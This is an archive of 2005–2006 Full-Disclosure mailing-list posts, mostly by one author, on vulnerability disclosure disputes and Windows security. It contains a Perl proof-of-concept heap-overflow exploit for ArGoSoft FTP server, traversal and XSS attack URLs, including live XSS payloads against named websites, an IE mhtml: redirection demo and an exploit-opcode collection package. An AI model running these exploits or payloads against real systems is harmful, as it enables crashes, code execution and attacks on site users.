Thanks
/JA
*
LIUDIEYU dot COM wrote:
 Upon IE7 release, Secunia published SA22477 titled `Internet Explorer
 7 mhtml: Redirection Information Disclosure`.

 Here I figured a straightforward demo - navigate IE7 to:
 * mhtml:http://www.google.com/url?q=http://www.yahoo.com/
 Google redirects to Yahoo, Yahoo content is loaded, but browser
 location is not updated.

 Microsoft blogs assure vulnerability brought up by Secunia is not in
 IE7, technically, rather, it's Outlook Express; and as usual, words of
 Microsoft were well honored by several public media sources.

 Microsoft do not even send the slightest comment that IE is a source
 of problem - despite there involves cross-domain data compromise, HTTP
 redirection, ActiveX(DOM also works) ... all in all, when this attack
 happens, it got to be IE and no other.

 Let me sum up: in this case IE is vulnerable, only IE is vulnerable,
 and Microsoft say These reports are technically inaccurate: the issue
 concerned in these reports is not in Internet Explorer 7 (or any other
 version) at all.

 Upon seeing mhtml:, it reminds of a magnificent historic incident
 which also involved mhtml: -- an IE exploit so perfectly and widely
 utilized that it made CERT suggest Use a different web browser(CERT
 KB VU#323070), and firstly initiated the boom of Firefox. Of course
 Microsoft is unlikely to say technically this is also not IE's
 problem.

 At last allow me to put an off-topic yet sentimental complaint ...
 Quite a while ago, when I got IE exploits and Secunia broadcasted
 about them, my name was in every news report; This month same
 situation, codedreamer - original finder of the mhtml: thing
 broadcasted by Secunia - was not properly given credit ... no
 mentioning in news reports, no mentioning in the famous first ever IE7
 advisory SA22477, codedreamer made the whole thing yet Secunia gave
 but one single line of credit in bottom of demo The test is based on
 Proof of Concept code by codedreamer. Let me say I'm a man who
 believes in paying respect, thus I made this little complaint, paying
 my respect to codedreamer.


 Best Wishes for All Firefox Surfers and Firefox 2.0

 Liu Die Yu
 25 OCT 06





Re: [Full-disclosure] Windows VML security update MS06-055 released

2006-09-27 Thread Jerome Athias
Juha-Matti Laurio wrote:

 It appears that the timestamp of updated Vgx.dll library is 18th 
 September, 2006.
so M$ knows timestomp! http://metasploit.com/projects/antiforensics/

:-P



[Full-disclosure] ExplorerXP : Directory Traversal and Cross Site Scripting

2006-03-29 Thread Jerome Athias
ExplorerXP : Directory Traversal and Cross Site Scripting

Software : ExplorerXP

Description :

Two vulnerabilities have been discovered in ExplorerXP, which can be
exploited by malicious people to conduct directory traversal and Cross
Site Scripting attacks.

Directory Traversal : http://[target]/dir.php?chemin=../../../

Cross Site Scripting : http://[target]/dir.php?chemin=../bSilitix

Solutions :
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by :
Silitix

Reference :

https://www.securinfos.info/english/security-advisories-alerts/20060329_.ExplorerXP_Directory.Traversal.and.Cross.Site.Scripting.php
http://ns79.hosteur.com/~secuti/explorerxp.php (Advisory in French)



Re: [Full-disclosure] VoIP Security whitepaper : a layered approach

2006-03-23 Thread Jerome Athias
Hi Fred,

nice paper
btw, what about H.323?

Regards
/JA
https://www.securinfos.info

- Original Message - 
From: Frederic Charpentier [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Thursday, March 23, 2006 3:43 PM
Subject: [Full-disclosure] VoIP Security whitepaper : a layered approach


 Hi FD,
 Our team is pleased to release a whitepaper about VoIP.
 This whitepaper proposes a security analysis of the Voice Over IP
 protocols with a layered approach.

 Link :
 http://www.xmcopartners.com/whitepapers/voip-security-layered-approach.pdf

 Chapters :
 1 VOICE OVER IP SECURITY
 1.1 A GENERAL OVERVIEW OF VOICE OVER IP
 1.2 VOICE OVER IP PARTICULARITIES
 1.3 VOICE OVER IP ARCHITECTURES
 1.4 VOICE OVER IP THREATS
 1.4.1 Signaling Protocols Layer
 1.4.1.1 SIP based Denials of Service
 1.4.1.2 SIP based Man in the Middle/Call Hijacking
 1.4.1.3 Possible solutions for SIP based attacks
 1.4.2 Transport Protocols Layer
 1.4.2.1 Eavesdropping
 1.4.2.2 RTP Insertion attacks
 1.4.2.3 RTCP insertion attacks
 1.4.2.4 Possible solutions for RTP based attacks
 1.4.3 Application Layer
 1.5 FUTURE THREATS TO VOICE OVER IP SECURITY
 2 CONCLUSIONS


 -- 
 Xmco Partners
 Security Consulting / Pentest
 web  : http://www.xmcopartners.com/





[Full-disclosure] ArGoSoft FTP server remote heap overflow

2006-02-25 Thread Jerome Athias
-- Title:
ArGoSoft FTP server remote heap overflow

-- Affected Products:
ArGoSoft FTP server 1.4.3.5 (current) and prior

-- Affected Vendor:
ArGoSoft - http://www.argosoft.com

-- Impact:
DoS, Arbitrary Code Execution

-- Where:
From remote

-- Type:
Heap Overflow

-- Vulnerability Details:
A remote attacker with valid credentials is able to trigger a heap
overwrite in ArgoSoft FTP server.
The bug occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code or
launch a denial of service attack.

-- Credit:
This vulnerability was discovered by Jerome Athias.
https://www.securinfos.info/english/




#!/usr/bin/perl

#  #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias   #
#  #

use strict;
use warnings;
use Net::FTP;

# getting data from the command line
# (string quotes and operators lost in the list archive are restored here)
my $host  = $ARGV[0];
my $port  = $ARGV[1];
my $debug = $ARGV[2];
my $user  = $ARGV[3];
my $pass  = $ARGV[4];

# ===

if ($host && $port) {

    # make exploit string: an over-long argument to the DELE command
    my $exploit_string = "DELE ";
    $exploit_string .= "A" x 2041;
    $exploit_string .= "B" x 4;
    $exploit_string .= "C" x 1026;

    #On Win2K SP4 FR:
    #EAX 42424241
    #ECX 43434343
    #EDX 43434342
    #EBX 43434B73

    # ===

    print "Trying to connect to $host:$port\n";
    my $sock = Net::FTP->new($host, Port => $port, Timeout => 30,
                             Debug => $debug)
        or die "[-] Connection failed\n";
    print "[+] Connect OK!\n";
    print "Logging in...\n";
    if (!$user) {
        $user = "test";
        $pass = "test";
    }
    $sock->login($user, $pass) or die "[-] Login failed: " . $sock->message;
    my $answer = $sock->message;
    print "Sending string...\n";
    $sock->quot($exploit_string);
} else {
    print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\n"
        . "Usage: $0 host port [debug: 1 or 0] username password\n\n";
}


Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Jerome Athias
$50,000 for reporting BSA that your neighbor uses an illegal version of
Window$ !

https://reporting.bsa.org/usa/home.aspx



Re: [Full-disclosure] defeating voice captchas

2006-02-14 Thread Jerome Athias
Did someone try to perform a sound brute-force attack against something
like a voice-password-protected PDA?

/JA



Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread Jerome Athias
Hey guy, do you know something about XSS
1) Phishing?
2) encoded URLs, UTF8...?
3) cookie stealing?
...

It won't be difficult to reproduce a website and have a URL that is
difficult for a basic user to understand...
Sure, it's harder to spoof the URL in the browser...
//

Native.Code wrote:
 What a lame vulnerability it is. If your POC redirects to another site
 (which is not MBT site), how someone will become victim and believe that
 he/she is doing business with MBT?

 Your post is yet another proof that FD is more and more inhibited by script
 kiddies. Get a life!
   


-
About FD:
Speech is silver, but silence is gold


/JA
https://www.securinfos.info/


Re: [Full-disclosure] Question for the Windows pros

2006-01-19 Thread Jerome Athias
Applying the Principle of Least Privilege to User Accounts on Windows XP

http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx

/JA


Re: [Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-28 Thread Jerome Athias
Note that you can register or unregister shimgvw.dll to enable or
disable WPFV:
- Disable: Start > Run > regsvr32 /u shimgvw.dll

- Enable:  Start > Run > regsvr32 shimgvw.dll

You can also use these registry files:

https://www.securinfos.info/english/WPFV_disable.reg
https://www.securinfos.info/english/WPFV_enable.reg

Note: If you unregister shimgvw.dll, Windows Explorer will not display
thumbnails anymore. So the registry tweak is a much better way to
disable WPFV. If PhotoEd is installed, it will open picture files after
WPFV is disabled.

/JA



Re: [Full-disclosure] Mozilla Firefox Host: Buffer Overflow

2005-09-09 Thread Jerome Athias
btw Netscape is also affected...



[Full-disclosure] IIS 5.1 Source Disclosure Under FAT/FAT32 Volumes Using WebDAV

2005-09-07 Thread Jerome Athias
It is possible to remotely view the source code of web script files
through a specially crafted WebDAV HTTP request. Only IIS 5.1 seems to be
vulnerable. The web script file must be on a FAT or a FAT32 volume; web
scripts located on an NTFS volume are not vulnerable.

The information has been provided by Inge Henriksen
mailto:inge.henriksen%20at%20booleansoft.com.
The original article can be found at:
http://ingehenriksen.blogspot.com/2005/09/iis-51-allows-for-remote-viewing-of.html

Advisory in french:
http://www.athias.fr/alertes-bulletins-securite/20050907_Microsoft.IIS.5.1_Divulgation.de.Sources.html

Regards
/JA



[Full-disclosure] Multi-Languages OPcodes DB

2005-08-26 Thread Jerome Athias
Hi,

As you probably all know, Windows DLLs have different base addresses
across Windows versions/SPs/languages,
so I think it could be useful to try to build a multi-language opcodes
database, couldn't it?
So, I have VERY QUICKLY put together a little package based on a .BAT and
some tools:


Files included in the package:

* OPCODES_LIST.bat : (horrible) Main batch file
MD5:   c43d4167f7352c211a97f8cf21cd0458
SHA1:  eb2f62912c9311351540dfc0237000e7bf090070

* Psinfo.exe : tool from sysinternals.com to retrieve Windows system
information and the list of installed hotfixes (also trying to use the
Windows 2003 "wmic qfe" command) (can take a while...)
MD5:   2c18e62e9902b0a258e6a64ab812f02c
SHA1:  0188d8836ba6a2a198abcfee9ae730b4ce0521aa

pdh.dll
MD5:   8542b31187bd1035a2311324c23e66b1
SHA1:  ecc77cd54061745273af9750c55c1434c24bcd74

* reg.exe : tool present on XP but not on all 2000... used to retrieve
the OS language (languages codes list included in the bat)
MD5:   5bc49b61651edbc0a80d2de16d7f422c
SHA1:  7a778b97bf7b68247e0b212a81c952118c1ba45a

* Findjmp2.exe : tool by Class101 to retrieve the opcodes in memory
(DLLs searched : KERNEL32.DLL, NTDLL.DLL, USER32.DLL, SHELL32.DLL,
GDI32.DLL, WS2_32.DLL, WS2HELP.DLL)
(registers searched : EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP)
MD5:   3909e20cb55ea82b01a3b593d0cc59b6
SHA1:  174169d18b039fcd11ee1507d0a7f8e4230ed717

* LISTDLLS.exe : tool from sysinternals.com used to retrieve the
versions of DLLs
MD5:   bb5f0e1d03f4e32261bb0964fc3b0e9d
SHA1:  c6081622207ec53f6400a6312a87cf350333996b

* mycrc.exe : tool by Luigi Auriemma to check files checksums (MD5,
SHA1, ...)
MD5:   5473219dd371630c1e7d7e7fa1ddd53f
SHA1:  37c71403ed231dd9cb9a6e97c869e7275372ba12

* grep.exe : used to parse the output a little bit
MD5:   9e05a9c264c8a908a8e79450fcbff047
SHA1:  0ab5c2b1c3c637cbe82564d6d9ed34a78c901cb7

* uniq.exe : used to parse the output a little bit



PLEASE NOTE :

1) we can do better and simpler!!!, so if you want: JUST DO IT and
please don't flame!
2) the output is far from clean! but could be easily parsed with a
simple script...

For those who want to help: please send me the resulting
OPCODES_LIST.TXT file
(PLEASE REMOVE ALL PERSONAL DATA FROM THE FILE! ;).
Then I'll try to check all the files and start to build something, of
course publicly available.


The package is available for download at:

http://www.athias.fr/OPCODES_LIST.RAR
MD5:   c4a7d4eba31afafb67ef488dda7cf19e
SHA1:  c99a98741a8365fe6872a2347d0b05891188c584

Please let me know missing things...

Thank you.
/JA




[Full-disclosure] Re: bluetooth devices list ?

2005-07-29 Thread Jerome Athias

http://trifinite.org/trifinite_stuff.html

/JA

http://www.athias.fr - Security Alerts and Bulletins


- Original Message - 
From: Mark Sec [EMAIL PROTECTED]
To: pen-test@securityfocus.com; full-disclosure@lists.grok.org.uk; 
security-basics@securityfocus.com

Sent: Wednesday, July 27, 2005 9:32 PM
Subject: bluetooth devices list ?


Alo folks

a) Does anyone have the latest list of vulnerable devices (mobile
devices, etc.) under Bluetooth?

something like this: (the "who's vulnerable" section)

http://www.thebunker.net/security/bluetooth.htm

b) Does anyone have the best mailing lists, tools, links and research
about Bluetooth vulnerabilities?

- Mark :-)



Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access

2005-07-28 Thread Jerome Athias



Hi,

you can try:

SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer

Create a DWORD called AutoShareServer and set its value to 0 (for a
server) OR AutoShareWks=0 (for workstations). It removes all $ (hidden)
shares EXCEPT IPC$ (needs a reboot).


net share ipc$ /delete
(i.e. in:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)


/JA
*
http://www.athias.fr - Security Alerts and Bulletins

  - Original Message - 
  From: Ramachandrand
  To: full-disclosure@lists.grok.org.uk
  Sent: Thursday, July 28, 2005 9:16 AM
  Subject: [Full-disclosure] NETBIOS SMB IPC$ unicode share access


  Hi,

  AM NEW TO SNORT KINDLY HELP ME
  In my network all are 2000 and XP PCs; all the users' home folders
  were mapped as \\servername\username$. On the server we used to
  create a folder and give access to the particular user.

  Recently I have installed snort and it keeps on alerting this msg
  "NETBIOS SMB IPC$ unicode share access"
  How to stop this event, i.e. not to detect this event? plz tell me in
  brief note.

  Thanks in advance.

  Regards,
  D.Ramachandran


Re: [Full-disclosure] Secunia published adviso withoutrespectingrelease date !

2005-07-16 Thread Jerome Athias

2 things I remind myself of...

1) http://seclists.org/lists/vulndiscuss/2004/Dec/0006.html

2) This is an answer from Thomas before the disclosure of a vuln that Secunia
found at the same time:


10/09/2004 19:40

Re: OpenOffice World-Readable Temporary Files Disclose Files to Local Users

Hi Jérôme,

This issue was originally discovered by Secunia on 16th August and
reported to the vendors.

Please do not forward to anyone else. The various vendors will release
updates on Wednesday in a co-ordinated disclosure.

Kind regards,

Thomas

On Fri, 2004-09-10 at 17:31, [EMAIL PROTECTED] wrote:

Date:  Thu, 9 Sep 2004 23:52:18 -0400
Subject:  http://www.openoffice.org/issues/show_bug.cgi?id=33357
Reporter: pmladek
OS:  Linux
Version:  OOo 1.1.2
Summary:  Insecure permissions on temporary files at runtime
 When OOo is started, a directory /tmp/sv.tmp is created, where
RAND is a 3 character random string. The permissions of this directory
allow other users (depending on the user's umask) to 'cd' to this
directory and list the contents.
 Once a file is saved, a zipped file is created in /tmp/sv.tmp and the
name of the file follows the same convention. The permissions of the file
allow others (depending on the user's umask) to read the content.
 Due to this any user can grab sensitive information of some other user.
 Steps to reproduce the problem:
1. Launch OpenOffice.
2. List /tmp contents. Locate the directory 'sv*.tmp'
3. Type in some contents in the document and save it.
4. List the contents of the directory /tmp/sv*.tmp/
5. Do not close OpenOffice. 'su' to a different user.
6. Copy the file under /tmp/sv*.tmp/ to home directory.
7. Use 'unzip' to unzip the files.
8. The file content.xml holds the data the user had just saved.
 The workaround is to set a more secure umask. The problem is that users
do not know about it. Why should they need to set a stricter umask if they
save their data in a directory which has the correct permissions? They do
not expect that there are any world-readable temporary data available
somewhere on the system.


Regards,
Jérôme ATHIAS
---

--
Kind regards,

Thomas Kristensen
CTO

Secunia
Toldbodgade 37B
1253 Copenhagen K
Denmark

Tlf.: +45 7020 5144
Fax:  +45 7020 5145



So, express your opinion, but either they want exclusivity, or they
respect the full-disclosure policy most of the time


My 0,01€
/JA

**
http://www.secunia.fr


- Original Message - 
From: Xavier Beaudouin [EMAIL PROTECTED]

To: [EMAIL PROTECTED]@class101.org
Cc: full-disclosure@lists.grok.org.uk
Sent: Thursday, July 14, 2005 12:59 PM
Subject: Re: [Full-disclosure] Secunia published adviso 
withoutrespectingrelease date !



This is usual with Secunia..

I had a bug in a beta version of software and they released a
vulnerability for *all* versions of this software
without even informing the maintainer (me) of this pseudo advisory.

My thoughts on these guys are now: don't even trust them... They
push advisories without testing and without respecting the
usual way to inform the developer as it should be.

My 0,02€
/xavier
On 13 Jul 05 at 23:45, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:





Then don't send to Secunia b4 the rls date ! HUH


- -Original Message-
From: [EMAIL PROTECTED] [mailto:full-
[EMAIL PROTECTED] On behalf of Eric Romang
Sent: Tuesday, 12 July 2005 21:09
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; Eric Romang
Subject: [Full-disclosure] Secunia published adviso without respectingrelease date !



Hello,

This advisory has been published on your website, but the patch is not
ready yet.
I contacted upstream today, before you released the advisory, so they
could react.

As you can see in the advisory, the release date was not given:

http://secunia.com/advisories/16040/
http://secunia.com/advisories/16038/

You released the advisory without respecting the normal process for
publishing advisories.

This guy is monitoring my /adviso/ folder.

80.161.200.182

I think this guy is working for you.

So please tell him to respect the normal process in a security
process.

Regards.


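The OpenOffice issue quoted earlier in this message (world-readable sv*.tmp directory and content.xml under /tmp) is an instance of a general bug class: temporary-file modes left to the caller's umask. The following is an added example, not code from any post in this thread or from OpenOffice: the reported pattern beside a hardened variant, with a constructed sample document and an audit helper that reads back the resulting modes.

```python
"""Insecure vs. hardened temporary-file creation (added example, not from
the thread or from OpenOffice). Reproduces the bug class in the quoted
OOo report and shows the fix: private directory and file modes that do
not depend on the process umask."""
import os
import stat
import tempfile


def other_readable(path: str) -> bool:
    """True when the 'other' class has read permission on path."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def insecure_save(base_dir: str, content: bytes) -> str:
    """Replica of the reported pattern: the work directory and the saved
    file inherit their mode from the umask, so with the usual 022 umask
    other local users can list the directory and read the file.
    'sv_demo.tmp' stands in for the sv*.tmp directory named in the report."""
    old_umask = os.umask(0o022)  # set explicitly so the demo is reproducible
    try:
        work_dir = os.path.join(base_dir, "sv_demo.tmp")
        os.mkdir(work_dir)                  # 0777 & ~022 -> 0755
        doc = os.path.join(work_dir, "content.xml")
        with open(doc, "wb") as fh:         # 0666 & ~022 -> 0644
            fh.write(content)
        return doc
    finally:
        os.umask(old_umask)


def hardened_save(base_dir: str, content: bytes) -> str:
    """Hardened variant: tempfile.mkdtemp creates the directory with mode
    0700 and os.open creates the file with mode 0600, independent of the
    umask. O_EXCL makes the open fail if something already sits at that
    path instead of silently writing through it."""
    work_dir = tempfile.mkdtemp(prefix="sv", suffix=".tmp", dir=base_dir)
    doc = os.path.join(work_dir, "content.xml")
    fd = os.open(doc, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return doc


def audit(path: str) -> dict:
    """Report whether the file or its directory is readable by 'other'."""
    return {
        "file_other_readable": other_readable(path),
        "dir_other_readable": other_readable(os.path.dirname(path)),
    }


def demo() -> dict:
    """Run both variants in a scratch directory and return their audits."""
    sample = b"<office:text>constructed sample document</office:text>"
    with tempfile.TemporaryDirectory() as base:
        return {
            "insecure": audit(insecure_save(base, sample)),
            "hardened": audit(hardened_save(base, sample)),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```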

Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS

2005-04-21 Thread Jerome ATHIAS
My 2 eurocents:
http://www.multimania.lycos.fr/myaccount/?lsu_ssl=?_loginName=?_loginName=lsu_err_msg=I%20LOVE%20XSS
http://trans.voila.fr/voila?systran_text=%3C/textarea%3E%3CBODY%20ONLOAD=document.write('I_LIKE_XSS!')%3E
Regards.
Jerome 
